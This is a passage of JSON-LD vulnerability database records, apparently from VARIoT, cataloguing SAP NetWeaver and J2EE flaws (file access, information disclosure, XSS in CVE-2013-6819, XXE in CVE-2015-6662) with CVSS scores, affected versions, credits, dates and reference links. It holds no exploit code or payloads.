"db": "BID",
"id": "58175"
},
{
"date": "2014-04-15T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2013-006310"
},
{
"date": "2014-04-11T17:16:02.123000",
"db": "NVD",
"id": "CVE-2013-7364"
},
{
"date": "2013-03-07T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201303-099"
},
{
"date": "2014-04-14T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201404-132"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201303-099"
},
{
"db": "CNNVD",
"id": "CNNVD-201404-132"
}
],
"trust": 1.2
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP J2EE Core Service Remote Arbitrary File Access Vulnerability",
"sources": [
{
"db": "BID",
"id": "58175"
},
{
"db": "CNNVD",
"id": "CNNVD-201303-099"
}
],
"trust": 0.9
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "permissions and access control",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201404-132"
}
],
"trust": 0.6
}
}
var-201710-1462
Vulnerability from variot
SAP NetWeaver is prone to an information-disclosure vulnerability. Attackers can exploit this issue to obtain sensitive information that may aid in launching further attacks.
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201710-1462",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "0"
}
],
"sources": [
{
"db": "BID",
"id": "101205"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The vendor reported the issue.",
"sources": [
{
"db": "BID",
"id": "101205"
}
],
"trust": 0.3
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver is prone to an information-disclosure vulnerability.\nAttackers can exploit this issue to obtain sensitive information that may aid in launching further attacks.",
"sources": [
{
"db": "BID",
"id": "101205"
}
],
"trust": 0.3
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "BID",
"id": "101205",
"trust": 0.3
}
],
"sources": [
{
"db": "BID",
"id": "101205"
}
]
},
"id": "VAR-201710-1462",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.26917922
},
"last_update_date": "2022-05-17T01:57:40.902000Z",
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 0.3,
"url": "http://www.sap.com/"
},
{
"trust": 0.3,
"url": "https://launchpad.support.sap.com/#/notes/2504129"
},
{
"trust": 0.3,
"url": "https://blogs.sap.com/2017/10/10/sap-security-patch-day-october-2017/"
}
],
"sources": [
{
"db": "BID",
"id": "101205"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "BID",
"id": "101205"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-10-10T00:00:00",
"db": "BID",
"id": "101205"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-10-10T00:00:00",
"db": "BID",
"id": "101205"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "network",
"sources": [
{
"db": "BID",
"id": "101205"
}
],
"trust": 0.3
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver Instance Agent Service Information Disclosure Vulnerability",
"sources": [
{
"db": "BID",
"id": "101205"
}
],
"trust": 0.3
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Design Error",
"sources": [
{
"db": "BID",
"id": "101205"
}
],
"trust": 0.3
}
}
var-201311-0365
Vulnerability from variot
Cross-site scripting (XSS) vulnerability in Performance Provider in SAP NetWeaver allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. Remote attackers can exploit this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201311-0365",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 1.6,
"vendor": "sap",
"version": null
},
{
"model": "netweaver",
"scope": null,
"trust": 0.8,
"vendor": "sap",
"version": null
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-005198"
},
{
"db": "NVD",
"id": "CVE-2013-6819"
},
{
"db": "CNNVD",
"id": "CNNVD-201311-290"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2013-6819"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Dmitry Chastukhin (ERPScan)",
"sources": [
{
"db": "BID",
"id": "58614"
},
{
"db": "CNNVD",
"id": "CNNVD-201303-524"
}
],
"trust": 0.9
},
"cve": "CVE-2013-6819",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": true,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 4.3,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2013-6819",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2013-6819",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201311-290",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-005198"
},
{
"db": "NVD",
"id": "CVE-2013-6819"
},
{
"db": "CNNVD",
"id": "CNNVD-201311-290"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Cross-site scripting (XSS) vulnerability in Performance Provider in SAP NetWeaver allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. \nRemote attackers can exploit this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks",
"sources": [
{
"db": "NVD",
"id": "CVE-2013-6819"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005198"
},
{
"db": "BID",
"id": "58614"
}
],
"trust": 1.89
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2013-6819",
"trust": 2.7
},
{
"db": "BID",
"id": "58614",
"trust": 0.9
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005198",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201311-290",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201303-524",
"trust": 0.6
}
],
"sources": [
{
"db": "BID",
"id": "58614"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005198"
},
{
"db": "NVD",
"id": "CVE-2013-6819"
},
{
"db": "CNNVD",
"id": "CNNVD-201311-290"
},
{
"db": "CNNVD",
"id": "CNNVD-201303-524"
}
]
},
"id": "VAR-201311-0365",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.27111164
},
"last_update_date": "2023-12-18T12:45:26.527000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Acknowledgments to Security Researchers",
"trust": 0.8,
"url": "http://scn.sap.com/docs/doc-8218"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-005198"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-79",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-005198"
},
{
"db": "NVD",
"id": "CVE-2013-6819"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.6,
"url": "http://scn.sap.com/docs/doc-8218"
},
{
"trust": 1.6,
"url": "https://service.sap.com/sap/support/notes/1784894"
},
{
"trust": 1.4,
"url": "http://erpscan.com/advisories/dsecrg-13-006-sap-netweaver-performance-provider-xss/"
},
{
"trust": 1.0,
"url": "https://erpscan.io/advisories/dsecrg-13-006-sap-netweaver-performance-provider-xss/"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-6819"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2013-6819"
},
{
"trust": 0.6,
"url": "http://www.securityfocus.com/bid/58614"
},
{
"trust": 0.3,
"url": "http://www.sap.com/"
}
],
"sources": [
{
"db": "BID",
"id": "58614"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005198"
},
{
"db": "NVD",
"id": "CVE-2013-6819"
},
{
"db": "CNNVD",
"id": "CNNVD-201311-290"
},
{
"db": "CNNVD",
"id": "CNNVD-201303-524"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "BID",
"id": "58614"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005198"
},
{
"db": "NVD",
"id": "CVE-2013-6819"
},
{
"db": "CNNVD",
"id": "CNNVD-201311-290"
},
{
"db": "CNNVD",
"id": "CNNVD-201303-524"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2013-03-14T00:00:00",
"db": "BID",
"id": "58614"
},
{
"date": "2013-11-21T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2013-005198"
},
{
"date": "2013-11-20T14:12:30.977000",
"db": "NVD",
"id": "CVE-2013-6819"
},
{
"date": "2013-11-22T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201311-290"
},
{
"date": "2013-03-26T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201303-524"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2013-11-21T01:09:00",
"db": "BID",
"id": "58614"
},
{
"date": "2013-11-21T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2013-005198"
},
{
"date": "2018-12-10T19:29:01.780000",
"db": "NVD",
"id": "CVE-2013-6819"
},
{
"date": "2013-11-22T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201311-290"
},
{
"date": "2013-03-26T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201303-524"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201311-290"
},
{
"db": "CNNVD",
"id": "CNNVD-201303-524"
}
],
"trust": 1.2
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver of Performance Provider Vulnerable to cross-site scripting",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-005198"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "XSS",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201311-290"
},
{
"db": "CNNVD",
"id": "CNNVD-201303-524"
}
],
"trust": 1.2
}
}
var-201508-0268
Vulnerability from variot
XML external entity (XXE) vulnerability in SAP NetWeaver Portal 7.4 allows remote attackers to read arbitrary files and possibly have other unspecified impact via crafted XML data, aka SAP Security Note 2168485. Vendors have confirmed this vulnerability SAP Security Note 2168485 It is released as. Supplementary information : CWE Vulnerability type by CWE-611: Improper Restriction of XML External Entity Reference ('XXE') (XML Inappropriate restrictions on external entity references ) Has been identified. An attacker can exploit this issue to gain access to sensitive information that may lead to further attacks
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201508-0268",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 1.6,
"vendor": "sap",
"version": "7.40"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": "portal 7.4"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2015-004472"
},
{
"db": "NVD",
"id": "CVE-2015-6662"
},
{
"db": "CNNVD",
"id": "CNNVD-201508-514"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.40:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2015-6662"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Dmitry Chastuhin, Vahagn Vardanyana and Roman Bejan from ERPScan.",
"sources": [
{
"db": "BID",
"id": "76424"
}
],
"trust": 0.3
},
"cve": "CVE-2015-6662",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": true,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 6.8,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2015-6662",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2015-6662",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201508-514",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2015-004472"
},
{
"db": "NVD",
"id": "CVE-2015-6662"
},
{
"db": "CNNVD",
"id": "CNNVD-201508-514"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "XML external entity (XXE) vulnerability in SAP NetWeaver Portal 7.4 allows remote attackers to read arbitrary files and possibly have other unspecified impact via crafted XML data, aka SAP Security Note 2168485. Vendors have confirmed this vulnerability SAP Security Note 2168485 It is released as. Supplementary information : CWE Vulnerability type by CWE-611: Improper Restriction of XML External Entity Reference (\u0027XXE\u0027) (XML Inappropriate restrictions on external entity references ) Has been identified. \nAn attacker can exploit this issue to gain access to sensitive information that may lead to further attacks",
"sources": [
{
"db": "NVD",
"id": "CVE-2015-6662"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-004472"
},
{
"db": "BID",
"id": "76424"
}
],
"trust": 1.89
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2015-6662",
"trust": 2.7
},
{
"db": "PACKETSTORM",
"id": "134507",
"trust": 1.0
},
{
"db": "JVNDB",
"id": "JVNDB-2015-004472",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201508-514",
"trust": 0.6
},
{
"db": "BID",
"id": "76424",
"trust": 0.3
}
],
"sources": [
{
"db": "BID",
"id": "76424"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-004472"
},
{
"db": "NVD",
"id": "CVE-2015-6662"
},
{
"db": "CNNVD",
"id": "CNNVD-201508-514"
}
]
},
"id": "VAR-201508-0268",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.27111164
},
"last_update_date": "2023-12-18T12:20:47.158000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "SAP Security Note 2168485",
"trust": 0.8,
"url": "http://scn.sap.com/docs/doc-55451"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2015-004472"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-Other",
"trust": 1.0
},
{
"problemtype": "CWE-Other",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2015-004472"
},
{
"db": "NVD",
"id": "CVE-2015-6662"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.4,
"url": "http://erpscan.com/advisories/erpscan-15-018-sap-netweaver-7-4-xxe/"
},
{
"trust": 1.0,
"url": "http://packetstormsecurity.com/files/134507/sap-netweaver-7.4-xxe-injection.html"
},
{
"trust": 1.0,
"url": "http://seclists.org/fulldisclosure/2015/nov/92"
},
{
"trust": 1.0,
"url": "http://www.securityfocus.com/archive/1/536957/100/0/threaded"
},
{
"trust": 1.0,
"url": "https://erpscan.io/advisories/erpscan-15-018-sap-netweaver-7-4-xxe/"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-6662"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2015-6662"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2015-004472"
},
{
"db": "NVD",
"id": "CVE-2015-6662"
},
{
"db": "CNNVD",
"id": "CNNVD-201508-514"
}
]
},
"sources": {
"@context": {
